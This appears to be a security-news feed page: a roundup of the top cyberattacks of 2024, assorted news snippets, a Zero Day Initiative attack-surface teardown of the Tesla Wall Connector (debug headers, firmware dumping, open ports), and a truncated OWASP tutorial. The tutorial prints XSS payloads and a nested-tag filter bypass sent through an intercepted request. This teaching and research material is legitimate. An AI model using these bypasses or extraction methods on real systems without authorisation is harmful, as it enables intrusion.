Cyberattacks this year have escalated into a high-stakes battle, with increasingly advanced attacks targeting critical infrastructure, personal data, and corporate systems. From state-sponsored cyberattacks to ransomware campaigns, the top cyberattacks of 2024 have proven that threat actors have been weaponizing advanced technologies to exploit vulnerabilities in both private and public sectors. According to the Cyble Global Cyber Threat Intelligence Overview 2024 report, ransomware attacks surged, with over 2,600 incidents across industries like healthcare, finance, and manufacturing.   Major groups like LockBit and RansomHub are pushing the frequency of attacks to new heights. Dark web activity grew, with over 700 incidents linked to data leaks and malware sales. Additionally, the first half of 2024 saw over 33 billion records leaked, which included the ""Mother of All Breaches"" that exposed 26 billion.   Among the top ransomware attacks of 2024, the BlackCat ransomware group played an important role in numerous breaches. Notably, groups like Volt Typhoon and Salt Typhoon, linked to China, have targeted vital U.S. infrastructure, while cybercriminals such as the BlackCat ransomware group have attacked organizations worldwide, compromising millions of sensitive records.   Companies like Change Healthcare and Dell have faced massive data leaks, affecting tens of millions, and cybercriminals have used platforms like Telegram to distribute stolen data. These incidents are among the biggest data leaks of 2024, impacting millions of users and organizations worldwide.  Meanwhile, advanced cyberattack techniques, such as exploiting vulnerabilities in legacy systems and using malware like KV Botnet, have continued to exploit weak points in global networks. Let’s look at the top cyberattacks of 2024, highlighting the most impactful incidents.  Top Cyberattacks of 2024: Looking Back at the Most Influential Attacks this Year!   The Cyber Express brings the compiled list of the top 10 cyberattacks of 2024, highlighting the most notorious attacks that affected companies, organizations, cities, individuals and governments worldwide.   1. China-Backed Volt Typhoon Hackers Target U.S. Infrastructure  [caption id=""attachment_99677"" align=""alignnone"" width=""1013""] Source: Federal Agencies[/caption] Volt Typhoon, a China-backed hacker group, recently carried out one of the top cyberattacks of 2024 on critical infrastructure in the U.S. and abroad. The mode of the weapon is reported to be KV Botnet malware, which was used to conceal their cyberattacks. The group exploited vulnerable SOHO routers, particularly Cisco and NetGear devices, which had reached their ""end of life"" and were no longer receiving security updates.   These compromised routers allowed the hackers to target sectors like communications, energy, and transportation. In response, a court-authorized operation led by the FBI, Justice Department, and CISA successfully removed the KV Botnet malware from hundreds of infected routers and severed their connection to the botnet.  This disruption is part of ongoing efforts to protect U.S. infrastructure from state-sponsored cyber threats. Officials called for replacing outdated routers to prevent reinfection and safeguard personal and national security. The FBI also encouraged public vigilance and continued reporting of suspicious activities. This attack is one of the biggest cyberattacks of 2024, with far-reaching implications for U.S. infrastructure  2. Change Healthcare Cyberattack Exposes Personal Data of 110 Million Americans [caption id=""attachment_99678"" align=""alignnone"" width=""1283""] Source: Change Healthcare[/caption] In February 2024, Change Healthcare (CHC) experienced a cyberattack, where hackers accessed sensitive data, including health insurance details, medical records, and personal information of millions of Americans.   The breach, linked to the BlackCat ransomware group, exposed up to a third of the U.S. population, with potentially 110 million individuals impacted. CHC took immediate action to shut down affected systems and launched an investigation, with support from cybersecurity experts and law enforcement.   The company confirmed that data was exfiltrated between February 17-20, 2024, and began notifying affected individuals in June. As part of its response, CHC offered two years of complimentary credit monitoring and identity protection services. They advised individuals to monitor financial statements and report any suspicious activities.  3. Snowflake Cyberattack Attack Leaks 165 Enterprises’ Data  [caption id=""attachment_99679"" align=""alignnone"" width=""750""] Source: The Cyber Express[/caption] The Snowflake data breach, impacting 165 customers, is considered one of the largest breaches of 2024, potentially affecting hundreds of millions. Snowflake, a U.S.-based cloud data storage company, faced an attack in April 2024, with hackers gaining access via compromised employee credentials.   These credentials were obtained through infostealing malware targeting demo accounts that lacked multi-factor authentication (MFA). Despite no breach of Snowflake’s core systems, attackers exploited vulnerabilities in third-party accounts, leading to the compromise of sensitive data from several high-profile clients.  Companies such as Santander Group, TicketMaster, LendingTree, and Pure Storage were among those affected. For instance, TicketMaster reported the potential exposure of 560 million user details and card information. Snowflake emphasized that there were no breaches within its platform, but security flaws, including outdated credentials and lack of MFA, were key contributors.  Snowflake has since collaborated with customers to enhance security, recommending MFA enforcement, regular credential rotation, and network access restrictions.   4. Dell Data Breach  [caption id=""attachment_99680"" align=""alignnone"" width=""768""] Source: Dell[/caption] Dell confirmed a data breach after a threat actor claimed to have stolen approximately 49 million customer purchase records. The breach, which affected a Dell portal containing non-financial customer data, exposed information such as names, physical addresses, order details, and warranty information, but did not include financial data, email addresses, or phone numbers.  Dell assured customers that no payment information had been compromised and was working with law enforcement and a third-party forensics firm to investigate the incident. The stolen data was later put up for sale on an underground forum by a hacker known as “Menelik,” who claimed to possess personal and company information from 7 million individual purchases and 11 million consumer business records.   While Dell did not confirm the sale, the threat actor detailed the data, which spanned from 2017 to 2024, including system shipment dates, service tags, and warranty details. Although the sale ceased, Dell warned customers about potential phishing and smishing attacks.   5. Ascension Health Faced $1.8 Billion Loss After Cyberattack Disruption  [caption id=""attachment_99681"" align=""alignnone"" width=""1053""] Source: Ascension Health[/caption] In May 2024, Ascension Health, one of the largest nonprofit health systems in the U.S., experienced a massive cyberattack that disrupted its operations and hindered its financial recovery. The cyberattack severely impacted clinical operations, caused systemwide disruptions, and led to additional expenses for remediation.  As a result, Ascension’s operating loss for the fiscal year ended at $1.8 billion, a setback after its earlier recovery. The attack also disrupted services, forcing Ascension to take certain systems offline and temporarily sever connections with business partners. Despite this setback, Ascension’s overall financial performance for FY24 showed a $1.2 billion improvement over the previous year, demonstrating the strength of its recovery efforts before the cyberattack. 6. Ransomware Attack Disrupts CDK Global, Impacting 15,000 Dealerships  [caption id=""attachment_99682"" align=""alignnone"" width=""750""] Source: The Cyber Express[/caption] In late June 2024, a ransomware attack on CDK Global, a key software provider for car dealerships, severely disrupted operations for major automotive retailers across North America. Companies such as Asbury Automotive, AutoNation, Lithia Motors, Penske, and Group 1 Automotive reported impacts due to the shutdown of CDK Global’s systems.  These systems, essential for managing sales, inventory, financing, and customer relationships, were temporarily halted as CDK took precautionary measures. The attack affected over 15,000 dealerships, forcing many to revert to manual processes to continue operations.  Asbury and other affected companies activated incident response plans, but the full extent of the data compromise remained unclear. Lithia Motors and Group 1 Automotive expressed concerns over the long-term financial impact, while Penske implemented contingency plans to maintain operations at its truck dealerships. CDK Global, which was negotiating with the ransomware group BlackSuit, acknowledged the attack and began working with third-party experts to assess the damage.  7. City of Columbus Cyberattack by Rhysida Ransomware  [caption id=""attachment_99683"" align=""alignnone"" width=""1066""] Source: The Columbus Dispatch[/caption] The City of Columbus experienced a cyberattack by the Rhysida ransomware group, claiming to have stolen 6.5 terabytes of data, including employee passwords. However, Mayor Andrew Ginther confirmed that the stolen data was either encrypted or corrupted, making it largely unusable. He assured the public that no personal information had been leaked onto the dark web, offering some relief to residents and city employees.  The cyberattack did not involve a ransom demand, which is unusual for ransomware attacks. Despite fears of compromised data, Ginther emphasized that any subsequent theft of personal information was likely unrelated to this specific incident. To protect employees, the city offered free credit monitoring and identity theft protection services, extending this to former employees as well.  In response, the city enhanced its cybersecurity measures and increased training for employees. The attack, which stemmed from a compromised website download, led to a quick response from the city’s Department of Technology and collaboration with federal agencies.  8. Star Health Data Breach Leaked Sensitive Customer Info on Telegram  [caption id=""attachment_99684"" align=""alignnone"" width=""935""] Source: Star Health[/caption] Sensitive customer information from Star Health and Allied Insurance, India’s largest health insurer, was found publicly accessible on Telegram and other websites. The breach, which surfaced in August 2024, involved millions of customers’ medical reports, policy documents, and personal details being sold online. The threat actor, known as “xenZen,” used Telegram chatbots to distribute free samples of the data, while selling bulk information on the cybercrime platform BreachForums.  The breach raised security concerns at Star Health as the data was readily accessible despite the company’s assurances. Telegram, a widely used messaging platform, was implicated for its role in facilitating the breach, as its chatbot feature was exploited by cybercriminals. Despite the platform’s efforts to remove the chatbots, new ones quickly emerged, continuing to sell the stolen data. Star Health confirmed the breach and assured customers that it was working with law enforcement to address the issue.  9. Cencora Confirms Data Breach in Patient Support Programs, Offers Free Identity Protection  [caption id=""attachment_99685"" align=""alignnone"" width=""750""] Source: The Cyber Express[/caption] In February 2024, Cencora, Inc. discovered unauthorized access to its information systems, potentially exposing personal data through its Lash Group affiliate’s patient support programs for Bristol Myers Squibb. The breach was detected on February 21, 2024, and after containment and investigation, it was confirmed by April 10, 2024, that some individuals'' personal information, including names, addresses, birth dates, health diagnoses, medications, and prescriptions, was involved. Cencora assured that there was no evidence of the data being misused or disclosed publicly but implemented precautionary measures, including offering free identity protection services. The company worked with cybersecurity experts, law enforcement, and outside attorneys to secure systems and prevent further incidents. Affected individuals were encouraged to enroll in Experian IdentityWorks for credit monitoring and identity restoration services, free for 24 months. 10. NHS Confirms Patient Data Stolen in June Cyberattack  [caption id=""attachment_99687"" align=""alignnone"" width=""926""] Source: NHS[/caption] NHS England confirmed that patient data managed by Synnovis, a pathology testing organization, was stolen in a ransomware attack on June 3, 2024. The Russian cyber-criminal group Qilin leaked nearly 400GB of private data on the darknet, including patient names, NHS numbers, and test details. Over 3,000 appointments were disrupted by the attack, which also affected financial documents related to Synnovis and NHS trusts. The attackers encrypted Synnovis'' systems and downloaded private data, demanding a ransom in Bitcoin. Qilin claimed responsibility, citing political motives related to the UK’s foreign involvement. Other Top Cyberattacks in 2024 That Shook the Horizon  EigenLayer lost $5.7 million in a cyberattack where attackers stole 1.6 million EIGEN tokens via a compromised email.  The Ticketmaster’s breach exposed 560 million customer records, including personal and credit card details. Hackers sold the data online, and affected users were warned to monitor their accounts.  A Chinese hacking group, ""Salt Typhoon,"" stole data from eight US telecoms, compromising millions of customer records. The breach is called the worst telecom hack in US history.  Microsoft detected a nation-state attack by Midnight Blizzard on January 12, 2024, compromising some corporate email accounts. No customer data was affected by the breach.   British auction house Christie''s was forced to take its website offline following a cyber-attack, which also caused a delay in one of its live auctions.   In April 2024, the City of Helsinki discovered a data breach in its education division, affecting tens of thousands. Hackers exploited an unpatched vulnerability in a remote access server to gain unauthorized access to a network drive.  Ivanti patched critical zero-day vulnerabilities in its Cloud Service Appliance (CSA) after exploitation attempts. The flaws, affecting CSA versions 5.0.1 and earlier, allowed attackers to bypass restrictions and execute remote code. Ivanti released updates in CSA 5.0.2 and urged CSA 4.6 users to upgrade.  Summing Up!  The top cyberattacks of 2024, such as the theft of 110 million records from Change Healthcare, breaches impacting major corporations like Dell, and ransomware attacks disrupting essential services, have shown how vulnerabilities in both legacy and modern systems are being exploited.   With the dark web fueling the distribution of stolen data, cybercriminals are changing their ways and adopting new technologies to target victims. To fight against such adversaries, it is more than important for organizations to adopt advanced security protocols, collaborate across sectors, and raise public awareness to protect sensitive information and infrastructure. 

by The Cyber Express

by ComputerWeekly

Hackers are abusing legitimate Windows utilities to target Thai law enforcement with a novel malware that is a mix of sophistication and amateurishness.

by Dark Reading

by CrowdStrike

by CrowdStrike

Editor''s note: The following blog post originally appeared on Levi Gundert''s Substack page.IntroductionA past conversation with an undercover federal agent who specializes in money laundering revealed staggering amounts of currency moving across geographic boundaries, skirting traditional Anti-Money Laundering (AML) processes. From local and transnational crime syndicates to presidential spouses and those looking to evade sanctions or tax regimes, the need to wash and move illicit funds into reputable banking channels has never been greater. The FTs recent AML coverage highlights the scale of the problem and provides timely background reading on money laundering networks, suspects, and indictments. One story is particularly relevant as it centers around proof of address compliance failures. Coincidentally, address verification is precisely the problem highlighted by a recent Recorded Future Payment Fraud Intelligence (PFI) report.Big Fraud and a Hong Kong AddressThe address in question is:12th Floor, San Toi Building,137-139Connaught Road Central, Hong KongThe San Toi Building (and 12th-floor visual estimate) provided by Google MapsThe address is linked to two scam website (fraud) clustersdesignated Misspelled and Brand as a Coverwhich share merchant accounts and payment processing logic. The three merchant accounts include CAMHUBSTORE, AQAPAY*xmvmxft, SMARTTECHHK, and gracefashionhub. Hundreds, if not thousands, of scam websites are connected to these merchants.A scam website snapshot. A victim articulates why Camhubstore is a scam site. These merchant accounts that process payments for fraudulent, non-existent goods are tied to the 12th floor of the San Toi Building as the registered business address. The address is even placed directly on some of the sites as a contact address. Heres where it gets interesting. The address is listed on the U.S. Treasury OFAC list for ties to an Iranian terrorism group. The 12th floor is presumably large enough to house multiple businesses and likely sufficiently small such that businesses transit through reasonably often. Of course, it would be difficult to draw a direct connection between these merchant accounts and terrorism based on a shared space address. Still, other questions remain, namely: how are these scam merchants acquiring the ability to process payment cards when their physical address is on the OFAC list? Remedying AML / KYC Compliance FailuresKnowing your customer (KYC) might be difficult when bad actors go to great lengths to obscure their identity and purpose, but this is an egregious case of acquiring banks and payment processors missing obviously problematic contact details.Geoff Whites book, The Lazarus Heist, documented that even routine checks can lead to better outcomes. In it, White details North Korean hackers'' inability to transfer a more significant amount (hundreds of millions of dollars) from Bangladesh Bank to a bank branch in Manila because the branch is located on Jupiter Street, and "Jupiter is also the name of a sanctioned Iranian shipping vessel. Addresses matter. Suppose the US pursues a more friendly regulatory environment for cryptocurrencies under President Trump, and exchanges find it easier to acquire bank accounts. In that case, the potential for money laundering may explode without rigorous AML / KYC / KYT efforts. The SEC may have fewer teeth, but banks and processors are still gambling if anyone can obtain a merchant account with little to no compliance checks. Indeed, the business incentives are aligned to offer maximum merchant accounts to generate more processing fees, and historically, compliance costs have eroded profitability. However, this may be an emerging opportunity for GenAI. Semi-autonomous agents trained to flag basic AML violations (for example, website contact details listed on OFAC, perhaps) and elastic agents that deploy on demand when a new merchant application is submitted would assist AML compliance efforts and help the financial services industry grappling with a tsunami of fraudulent merchant transactions.

by Recorded Future

OWASP has issued a new guide specifically for addressing and mitigating deepfake security risks by applying fundamental security principles.

by Barracuda

Using real-world examples and offering plenty of pragmatic tips, learn how to protect your directory services from LDAP-based attacks. The post LDAP Enumeration: Unveiling the Double-Edged Sword of Active Directory appeared first on Unit 42.

by Palo Alto Networks - Unit42

A new social engineering campaign has leveraged Microsoft Teams as a way to facilitate the deployment of a known malware called DarkGate. ""An attacker used social engineering via a Microsoft Teams call to impersonate a user''s client and gain remote access to their system,"" Trend Micro researchers Catherine Loveria, Jovit Samaniego, and Gabriel Nicoleta said. ""The attacker failed to install a

by The Hacker News

Texas Tech University reports a data breach affecting 1.4 million, exposing personal, health, and financial data from its health sciences centers. Texas Tech University disclosed a data breach that impacted over 1.4 million individuals following a cyber attack. The security breach exposed the personal, health, and financial data from its health sciences centers, the Health […]

by Security Affairs

In February 2024, Serbian journalist Slaviša Milanov was taken to a police station following what seemed like a routine traffic stop. But after his release, the phone that he’d been asked to leave with police station reception staff was behaving oddly, and data and Wi-Fi settings were turned off, possible signs of hacking. Milanov contacted Amnesty International’s Security Lab about the incident, which led to several remarkable discoveries: A commercial forensic tool widely used by police and intelligence forces around the world had been misused to plant previously unknown Android spyware on Milanov’s phone, using Qualcomm zero-day vulnerabilities, all without due process. The Amnesty investigation deepened from there to find at least three additional cases, and evidence for potentially “dozens, if not hundreds” more. The findings, detailed in a new report from Amnesty, shed light on how Serbia spies on its own citizens, with help from Israel-based Cellebrite that Amnesty says violates international law and the product’s terms of use. “Our investigation reveals how Serbian authorities have deployed surveillance technology and digital repression tactics as instruments of wider state control and repression directed against civil society,” Dinushika Dissanayake, Amnesty International’s Deputy Regional Director for Europe, said in a statement. “It also highlights how Cellebrite mobile forensic products – used widely by police and intelligence services worldwide – can pose an enormous risk to those advocating for human rights, the environment and freedom of speech, when used outside of strict legal control and oversight.” Cellebrite Abused to Install New ''NoviSpy'' Android Spyware Amnesty Security Lab identified a previously unknown spyware tool called “NoviSpy,” which while less powerful than better known tools like NSO Group’s Pegasus spyware, can nonetheless “capture sensitive personal data from a target phone and provide capabilities to turn on a phone’s microphone or camera remotely.” Cellebrite forensic tools “are used to both unlock the phone prior to spyware infection and also allow the extraction of the data on a device,” Amnesty charged, adding that Cellebrite is investigating those claims. “In at least two cases, Cellebrite UFED exploits (software that takes advantage of a bug or vulnerability) were used to bypass Android device security mechanisms, allowing the authorities to covertly install the NoviSpy spyware during police interviews,” Amnesty said. “Our forensic evidence proves that the NoviSpy spyware was installed while the Serbian police had possession of Slaviša’s device, and the infection was dependent on the use of an advanced tool like Cellebrite UFED capable of unlocking the device,” stated Donncha Ó Cearbhaill, the Head of Amnesty International’s Security Lab. A second case in Amnesty’s 87-page report involved an environmental activist, Nikola Ristić, with “similar forensic evidence of Cellebrite products used to unlock a device to enable subsequent NoviSpy infection.” The report also details the history of use or procurement of spyware by Serbian authorities from Finfisher, NSO Group, and Intellexa, over the last decade. Qualcomm Vulnerabilities Exploited for Android Spyware Amnesty worked with Google’s Threat Analysis Group (TAG) on the investigation, which detailed its findings in a separate technical blog. Among the findings were a zero-day Android use-after-free vulnerability (CVE-2024-43047) used in Cellebrite UFED that was “patched in the course of this research,” and the discovery of five additional Qualcomm vulnerabilities that were likely exploited in an attack chain. Two of the vulnerabilities (CVE-2024-49848 and CVE-2024-21455) were not fixed by Qualcomm under the industry standard 90-day deadline, Google said, and CVE-2024-49848 remains unpatched 145 days after it was reported. Zero-Click Attack Used to Install Android Spyware Amnesty speculated that a zero-click attack may have been used in some cases targeting Voice-over-Wifi or Voice-over-LTE (VoLTE) functionality used in Android devices for Rich Communication Suite (RCS) calling. The report included a screenshot (republished below) of random, invalid numbers sent to one victim, after which the phone’s battery began to drain quickly. [caption id=""attachment_99693"" align=""aligncenter"" width=""250""] Possible zero-click attack leading to NoviSpy infection[/caption]

by The Cyber Express

The cyberattack impacts at least 1.4 million patients, as tranches of highly sensitive personal, medical, and financial data fall into the hands of cyber crooks who have everything they need to carry out convincing social engineering and fraud attacks.

by Dark Reading

A new phishing campaign has been observed employing tax-themed lures to deliver a stealthy backdoor payload as part of attacks targeting Pakistan. Cybersecurity company Securonix, which is tracking the activity under the name FLUX#CONSOLE, said it likely starts with a phishing email link or attachment, although it said it couldn''t obtain the original email used to launch the attack. ""One of the

by The Hacker News

Actions direct agencies to deploy specific security configurations to reduce cyber-risk.

by Dark Reading

This post first appeared on blog.netwrix.com and was written by David Metzgar.OAuth is an authorization protocol that grants third-party websites or applications limited access to a user’s information (like their email or photos) — without sharing their logon credentials. For example, suppose you want to sign up for an app to help you track your fitness goals. Through the power of OAuth, you may have the … Continued

by Netwrix

This post first appeared on blog.netwrix.com and was written by James Anderson.Managing change for in-house applications and platforms is crucial for maintaining stability, security, and accountability. Unlike managing changes at the device level, working with applications requires a more comprehensive strategy. Let’s break it down. Why Change Control Matters Imagine trying to manage an application that spans multiple environments, each with its unique configurations. Things can … Continued

by Netwrix

This post first appeared on blog.netwrix.com and was written by Dirk Schrader.Introduction to Cyber Attacks: Understanding the Global Threat Cyber attacks are deliberate attempts to steal, alter, or destroy data or to disrupt operations and to damage the digital parts of a critical infrastructure. This blog post explores the most destructive major cyber attacks in history, detailing the underlying motives and impact, and then offers prevention … Continued

by Netwrix

by Dark Reading

Even the best companies with the most advanced tools can still get hacked. It’s a frustrating reality: you’ve invested in the right solutions, trained your team, and strengthened your defenses. But breaches still happen. So, what’s going wrong? The truth is, that attackers are constantly finding new ways to slip through cracks that often go unnoticed—even in well-prepared organizations. The good

by The Hacker News

by ComputerWeekly

The Tesla Wall Connector is a Level 2 electric vehicle charge station designed for use by residential home users. The device has a minimal user interface in its hardware, providing a Wi-Fi based interface for configuration and an NFC reader for user authentication. The device does not come with a dedicated mobile application out of the box; the initial configuration—which is rather minimal—is performed via the web interface. After that, the device suggests the Tesla One app is to be used for further configuration. The Tesla app allows connecting to the device but apparently can only be used to perform a few functions such as scheduled charging and viewing information about the device. It does not offer options for further configuration.At the moment of writing, the latest software version was reported as 24.36.3.Hardware AnalysisTrend ZDI researchers have performed an analysis of the discrete hardware components found in the device. The device itself is comprised of several printed circuit boards (PCBs) hosting the system; the “main” PCB contains power and communications electronics while the smaller flex core PCB carries the minimalistic human interface in the form of several LEDs and the NFC reader circuitry.Below is a list of notable parts on the main PCB:·      U1 AD ADE7854AACPZ, a 3-phase energy measurement IC,·      U7 ST STM32L431RCT6, an ARM MCU with 256KB of Flash memory,·      U20 NXP 7102 3105, an unknown device, but likely to be an I2C secure element,·      U21 AzureWave AW-CU300, a WLAN module,·      U27 GigaDevice 25Q128E, a 128MB serial Flash.On the board itself, about half of the area is occupied by the power electronics, with low-current electronics being concentrated on the left in this photo. Of most interest, the STM32 MCU is at the top left in Figure one (below) and the comms module is at the middle left. The number of external connectors is kept at a minimum, with J3 in the middle providing connection for non-power signals in the charging cable. Figure 1 - Tesla Wall Connector main PCB top The bottom side of this board carries a variety of small components and the energy-metering IC. The green connector on the bottom left has an unknown purpose. Figure 2 - Tesla Wall Connector main PCB bottom Notably, many signals appear to be broken out on unpopulated pin headers. Once the varnish is removed, connecting to any MCU pin should be easy.There are multiple unpopulated footprints on the top side of the board. Of these, J1 and J7 immediately stand out. Trend ZDI researchers have determined that J1 is wired to the STM32 MCU and has a standard ARM JTAG/SWD 10-pin connector pinout. Dealing with J7 was considerably more complicated, but it seems reasonable to assume a similar pinout, if not identical.Unfortunately, rather little information was found regarding the communications module used in this device. It appears to be produced by AzureWave Technologies, Inc. On their website, the AW-CU300 modules are listed as carrying a MW320 SoC which appears to reference 88MW320, a SoC designed by Marvell and then acquired by NXP. In terms of software, however, the only mention made is that the module uses “Marvell Smart Connect”. No downloads of binary images or sources are provided by AzureWave.Trend ZDI researchers look forward to discussing with the contestants the role the U20 IC plays in the overall system security.Firmware ExtractionExtracting the STM32 firmware proceeded without many obstacles. As the J1 connector pinout is known, just connecting an ST-Link V2 dongle proved to be sufficient to dump out the whole contents of the on-chip flash.Extracting the firmware of the communication module, however, turned out to be more challenging. After attempting multiple approaches, Trend ZDI researchers were unable to interact with the interface over the J7 connector to get any meaningful results; only once, the device returned an IDCODE of all zeros in the JTAG mode when using a pinout corresponding to the ARM 10-pin connector. The unavailability of JTAG seems to be consistent with documented behavior when the MW320 SoC is in its secured mode: in this case, the JTAG interface is expected to be disabled by default and will not be enabled by the boot ROM. Figure 3 - Tesla Wall Connector—detail of low-power electronics; both debugging headers installed Another avenue of attack would be extracting contents of the GigaDevice serial flash device U26—after all, this is all the storage the communications module has available. The challenge here is two-fold: first, the Flash device is inconveniently positioned in a tight space between the module and the flat cable connector J6, posing considerable risk of damaging the connector while attempting to remove the Flash chip from the board; second, the Flash contents may be encrypted at rest with an unknown key, hindering further analysis. That said, Trend ZDI researchers found a way to dump the contents of this IC in-system.Looking closely, all the signal pins of U26 are broken out through small vias and can be accessed on the bottom side; since those vias are not covered with solder mask, they probably double up as test points. By soldering to these points, it is possible to build an “adapter” good enough to connect the chip to a flash programmer such as the TL866+. Here is how vias correspond to the IC pins: Figure 4 - Tesla Wall Connector—detail of the vias connection Pin 8, VDD, is not directly accessible here but can be tapped off the debugging connector. The only issue is that the communications module CPU is simultaneously executing code, driving all the signals. This can be overcome by keeping the CPU in reset; experimentally, placing a 1 kΩ resistor between pins 3 and 10 of J7 achieved exactly that.As a bonus, this interface enables experimenting on the system without having to resolder the flash chip every time.Firmware AnalysisThe STM32 flash image is clearly partitioned into two parts, the bootloader and the application, with the latter starting at offset 0x5000. The extracted STM32 firmware was found to be completely stripped of any useful ASCII strings. This made it very challenging for Trend Micro researchers to identify any specific software components in use. What could be said, however, is that the MCU does not appear to be in charge of handling any internet-facing communications. It does seem to use some kind of an RTOS, due to the presence of what looked like thread names in the few strings the image had: wifirx, wifitx, wifireltx, cantx, canrx, metertrx, leds, and IDLE. Based on that, we conclude that the MCU mostly deals with CAN, metering, and LEDs, while the communications module then handles the rest of the communications.The communications module firmware is somewhat more involved, as code signing is supported and used. The image was inspected in a hex editor; the contents were not encrypted. The following interesting fragments were detected:·      0x00000000: A secure boot header corresponding to what is described in SoC documentation is found there.·      0x000002BA: A short code fragment, apparently a bootloader of sorts.·      0x00004000: A short header marked with WMPT, which looks like a partition table for the rest of the flash.·      0x00005000: A copy of the above.·      0x00006000: The psm partition. This seems to contain some (encrypted?) configuration data.·      0x00008000: The mcufw partition, storing the actual application firmware. The format of this image has been investigated before by others.·      0x00288000: The second mcufw partition.·      0x00508000: The fs partition, which is littlefs-formatted. This appears to contain mostly log data.As a side note, the mcufw image appears to include the full STM32 image inside; likely, the comms module can reprogram the STM32 MCU directly.Network Traffic Analysis The device provides its own Wi-Fi access point for configuration and management with the SSID starting with TeslaWallConnector and the passphrase comprised of 12 upper-case letters. Once connected to an AP, it is possible to interact with the web-based interface and configure the unit to connect itself to an internet-facing Wi-Fi network. This allows the user to monitor the unit, and the unit to communicate with remote endpoints and update itself when a new software version becomes available. A network scan was performed with nmap, which discovered TCP ports 80 and 34578 as well as UDP ports 67 and 5353 open on the device. This set of ports remained the same independent of whether the device was configured to connect to a Wi-Fi access point or remained standalone; the same TCP ports were exposed over the client side when connected to the Wi-Fi AP. When connected, the device communicated to the following servers:·      hermes-prd.sn.tesla.services·      wc-maestro-prd.sn.tesla.services·      s3-us-west-2.amazonaws.comCommunications with the first two services were TLS-protected, and both client and server certificates were requested and provided by both sides. The server certificates were issued by Tesla Energy Services CA, while the client certificate came from NXP Plug Trust CA. MitM attacks were not attempted by Trend Micro researchers at this point. The third endpoint, however, used plain HTTP. This allowed to snoop on the requested data, which turned out to be the software update bundle. The bundle was found to be encrypted; a cursory search on the web did not reveal any hints on the algorithm or the key.Research on TCP port 34758 seems to indicate that this is an endpoint for load-sharing setup, requiring mutual TLS authentication before further access can be gained.SummaryWhile these may not be the only attack surfaces available on the Tesla Wall Connector unit, they represent the most likely avenues a threat actor may use to exploit the device. We’re excited to see what research is displayed in Tokyo during the Pwn2Own Automotive event. Stay tuned to the blog for attack surface reviews for other devices, and if you’re curious, you can see all the devices included in the contest. Until then, you can find me on Mastodon at @infosecdj, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.

by Zero Day Initiative Blog

by ComputerWeekly

A suspected South Asian cyber espionage threat group known as Bitter targeted a Turkish defense sector organization in November 2024 to deliver two C++-malware families tracked as WmRAT and MiyaRAT. ""The attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads,"" Proofpoint

by The Hacker News

The CL0P ransomware gang has claimed responsibility for attacks exploiting a vulnerability in Cleo file sharing products.

by ThreatDown

In a previously unreported August memo, the Department of Homeland Security urged state and local police to conduct exercises to test their ability to respond to weaponized drones.

by WIRED Security News

An online repository of screenshots where victims filled out their payment card details online was publicly accessible.

by Malwarebytes Labs

Addressing cyber threats before they have a chance to strike or inflict serious damage is by far the best security approach any company can embrace. Achieving this takes a lot of research and proactive threat hunting. The problem here is that it is easy to get stuck in endless arrays of data and end up with no relevant intel.  To avoid this, use these five battle-tested techniques that are

by The Hacker News

Three vulnerabilities in the service''s Apache Airflow integration could have allowed attackers to take shadow administrative control over an enterprise cloud infrastructure, gain access to and exfiltrate data, and deploy malware.

by Dark Reading

The FBI warned of a fresh wave of HiatusRAT malware attacks targeting internet-facing Chinese-branded web cameras and DVRs. The Federal Bureau of Investigation (FBI) released a Private Industry Notification (PIN) to warn of HiatusRAT malware campaigns targeting Chinese-branded web cameras and DVRs. The report includes a set of recommendations to mitigate the exposure to the […]

by Security Affairs

Program designed to validate and sharpen cybersecurity skills for working professionals.

by Dark Reading

The Irish Data Protection Commission (DPC) has announced its final decision in two inquiries into Meta Platforms Ireland Limited (MPIL), levying a combined €251 million in fines for GDPR violations related to a 2018 Facebook data breach. The incident, which compromised sensitive user information, arose from the unauthorized exploitation of user tokens on the Facebook … The post Ireland Fines Meta €251 Million Over 2018 Facebook Data Breach appeared first on CyberInsider.

by Cyber Insider

Threat actors are using voice phishing (vishing) attacks via Microsoft Teams in an attempt to trick victims into installing the DarkGate malware, according to researchers at Trend Micro.

by KnowBe4

The U.S. Justice Department revealed indictments against 14 North Korean nationals for their involvement in a long-running scheme designed to pose as remote IT professionals.

by KnowBe4

Ransomware attacks targeting utilities have surged by 42% over the past year, with spear phishing playing a major role in 81% of cases, according to a ReliaQuest study spanning November 2023 to October 2024.

by KnowBe4

Getting inside the mind of a threat actor can help security pros understand how they operate and what they''re looking for — in essence, what makes a soft target.

by Dark Reading

Bogus software update lures are being used by threat actors to deliver a new stealer malware called CoinLurker. ""Written in Go, CoinLurker employs cutting-edge obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyber attacks,"" Morphisec researcher Nadav Lorber said in a technical report published Monday. The attacks make use of fake update alerts that employ

by The Hacker News

Breaking Down the OWASP Top 10: Insecure Design Andrew Pratt Tue, 12/17/2024 - 11:16 Body In the absence of these considerations, systems can be retrofitted with ineffective security controls or lack them entirely. This can be attributed to teams rushing to meet a release deadline or those who are unaware of the security threats they may encounter.This lack of threat modeling and adherence to best practices and principles is what we, as hackers, can capitalize on.To understand what is considered an insecure design vulnerability, let''s evaluate some of the Common Weakness Enumerations (CWEs) mapped to this classification. You can view the full list here.CWE-602: Client-Side Enforcement of Server-Side SecurityThis design weakness arises when a server relies solely on client-side protections for enforcing security policies.Many web applications implement input validation or sanitization to prevent malicious payloads from being processed by the server. These security measures also restrict the data end users are allowed to submit, such as rules governing the allowed data type, minimum/maximum length, format, or characters.These protections often take place on the client side because it improves the speed of the checks and provides a better user experience, however, if user input is not also properly checked by the server, you can easily circumvent these defensive measures through the use of an HTTP proxy tool such as Caido. By intercepting a request after it is sent by the browser, you can bypass any client-side restrictions or checks, allowing you to modify the data being sent.For example, consider a form that limits users to alphanumeric characters when supplying input to the fields. To accomplish this, the developers defined the following validation schema using the Zod library:While this would block a payload such as <img src=x onerror=alert()> from being submitted, if the backend is not validating the data again, you could simply supply valid input initially and then change the value in an intercepted request:POST /comment HTTP/1.1Host: example.comcomment=%3Cimg%20src%3Dx%20onerror%3Dalert()%3ESimilarly, if sanitization is being used to remove data containing script tags but is only performed in the frontend, you could bypass this check by embedding the tag within another:<scr<script>ipt>alert()</scr<script>ipt>As you can see, this vulnerability would allow you to send arbitrary data that will be handled by the backend – a design choice that was not intended. While this may be sufficient for a normal user, it would be inadequate against you as a bug bounty hunter.CWE-73: External Control of File Name or PathWhen parameters that specify files are exposed, without the proper 